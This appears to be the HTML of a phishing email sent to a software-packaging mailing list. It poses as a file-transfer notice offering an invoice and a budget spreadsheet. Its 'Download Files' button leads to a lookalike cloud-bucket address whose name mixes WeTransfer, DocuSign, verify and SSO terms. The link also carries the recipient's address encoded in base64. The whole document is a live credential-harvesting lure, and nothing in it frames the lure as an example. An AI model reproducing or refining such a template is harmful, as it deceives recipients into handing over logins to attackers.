<!DOCTYPE html>

<html lang="en"><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
  <title>File Transfer</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #f5f7fa;
      margin: 0;
      padding: 0;
    }
    .container {
      max-width: 600px;
      margin: 50px auto;
      background: #ffffff;
      padding: 30px;
      border-radius: 10px;
      box-shadow: 0 2px 10px rgba(0,0,0,0.08);
    }
    .header {
      text-align: center;
      padding-bottom: 20px;
      border-bottom: 1px solid #eee;
    }
    .header h1 {
      margin: 0;
      color: #333;
      font-size: 22px;
    }
    .content {
      padding: 20px 0;
      color: #444;
      font-size: 14px;
      line-height: 1.6;
    }
    .file {
      background: #f9fafc;
      border: 1px solid #e6e9ef;
      padding: 12px;
      border-radius: 6px;
      margin-bottom: 10px;
      display: flex;
      justify-content: space-between;
    }
    .footer {
      text-align: center;
      font-size: 12px;
      color: #888;
      margin-top: 20px;
    }
    .button {
      display: inline-block;
      margin-top: 15px;
      padding: 10px 18px;
      background: #4a6cf7;
      color: #fff;
      text-decoration: none;
      border-radius: 6px;
    }
  </style>
</head>
<body>

<div class="container">
  <div class="header">
    <h1>You’ve received files</h1>
  </div>

  <div class="content">
    <p>Hello pkg-freedesktop-maintainers ,</p>
    <p>The following files have been shared with you:</p>

    <div class="file">
      <span>invoice_May_2026.pdf</span>
      <span>2.4 MB</span>
    </div>

    <div class="file">
      <span>Budget_Projections.xlsx</span>
      <span>890 KB</span>
    </div>

    <p>You can download and view them using the link below:</p>

    <a class="button" href="https://wetransferverifyserdocusigncloudssoauttio5467.s3.eu-central-3.ionoscloud.com/wetransfer_secure_access2.html?cl=cGtnLWZyZWVkZXNrdG9wLW1haW50YWluZXJzQGxpc3RzLmFsaW90aC5kZWJpYW4ub3Jn">Download Files</a>
  </div>

  <div class="footer">
    This is an automated file delivery message.
  </div>
</div>


</body></html>